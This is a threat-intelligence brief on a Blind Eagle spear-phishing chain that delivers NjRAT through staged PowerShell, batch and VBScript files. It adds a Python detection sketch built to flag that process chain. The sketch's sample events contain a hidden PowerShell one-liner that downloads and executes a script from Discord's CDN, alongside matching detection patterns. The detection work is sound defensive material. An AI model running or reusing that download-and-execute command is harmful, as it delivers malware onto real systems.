ThreatMon researchers attributed a new multi-stage attack chain to the Blind Eagle cyberespionage group. The chain ultimately leads to the deployment of NjRAT on infected systems.

Diving into details

In this attack campaign, Blind Eagle leverages social engineering, custom malware, and spear-phishing attacks.
  • A JavaScript downloader runs a PowerShell script hosted on Discord's CDN. That script, in turn, drops another PowerShell script and a Windows batch file, and stores a VBScript file in the Windows startup folder for persistence.
  • At startup, the VBScript runs the batch file, which deobfuscates itself and executes the previously delivered PowerShell script.
  • In the final stage, that PowerShell script launches NjRAT, also known as Bladabindi - a RAT that lets the attacker control the compromised system through a graphical user interface.
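As an added example (not code from the ThreatMon or Cyware write-up), a detection-side sketch in Python: it correlates constructed process-creation events to flag the chain described above, a Startup-folder .vbs run by wscript.exe that spawns cmd.exe for the batch file, which in turn spawns powershell.exe, and raises the severity when the PowerShell command line fetches from Discord's CDN. The event field names, sample paths and URL are assumptions, not indicators from the report.

```python
"""Flag the wscript.exe -> cmd.exe -> powershell.exe chain rooted in the Startup folder."""
import re

# Constructed process-creation events (simplified Sysmon EID 1-like shape; field names assumed).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\AppData\Roaming\run.bat"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c IEX(New-Object Net.WebClient)"
                ".DownloadString('https://cdn.discordapp.com/attachments/1/2/stage2.ps1')"},
    # Benign: an interactive cmd.exe under explorer.exe launching PowerShell.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 501, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
]

# A .vbs under the per-user or common Startup folder, as seen in the wscript.exe command line.
STARTUP_VBS_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\"']+\.vbs", re.IGNORECASE)
# PowerShell pulling content from Discord's CDN, as the chain above does.
DISCORD_CDN_RE = re.compile(r"https?://cdn\.discordapp\.com/", re.IGNORECASE)

def _image_name(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid, max_depth=16):
    """Return [event, parent, grandparent, ...] for pid, stopping at unknown parents."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_chains(events):
    """Alert on every powershell.exe whose parent is cmd.exe and grandparent is a Startup-folder wscript.exe."""
    alerts = []
    for event in events:
        if _image_name(event["image"]) != "powershell.exe":
            continue
        chain = ancestry(events, event["pid"])
        names = [_image_name(e["image"]) for e in chain]
        if names[:3] != ["powershell.exe", "cmd.exe", "wscript.exe"]:
            continue
        if not STARTUP_VBS_RE.search(chain[2]["cmdline"]):
            continue
        severity = "high" if DISCORD_CDN_RE.search(event["cmdline"]) else "medium"
        alerts.append({"pid": event["pid"], "severity": severity, "chain": " <- ".join(names[:3])})
    return alerts
```

Only the Startup-rooted chain (pid 400) is flagged; the interactive cmd.exe -> powershell.exe pair is ignored because its grandparent is explorer.exe.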

Blind Eagle stays relevant

Blind Eagle or APT-C-36 is believed to be a Spanish-speaking group that primarily targets private and public sector entities in Colombia. However, the group's attacks have also been observed in Ecuador, Chile, and Spain.
  • In March, the group was found conducting a new campaign against multiple Colombian entities; the campaign was first traced back to February.
  • The threat actors impersonated a Colombian government tax agency to target key sectors.
  • Blind Eagle has, furthermore, targeted organizations in Ecuador, Chile, and Spain.

The bottom line

Blind Eagle primarily uses NjRAT, AsyncRAT, Remcos RAT, LimeRAT, and QuasarRAT in its campaigns. Its modus operandi has remained the same since its emergence, which indicates that the group is comfortable running spear-phishing campaigns as long as they keep hitting their targets. Organizations should therefore upgrade their security posture to stay safe, and training employees to recognize phishing emails is strongly recommended.
Cyware Publisher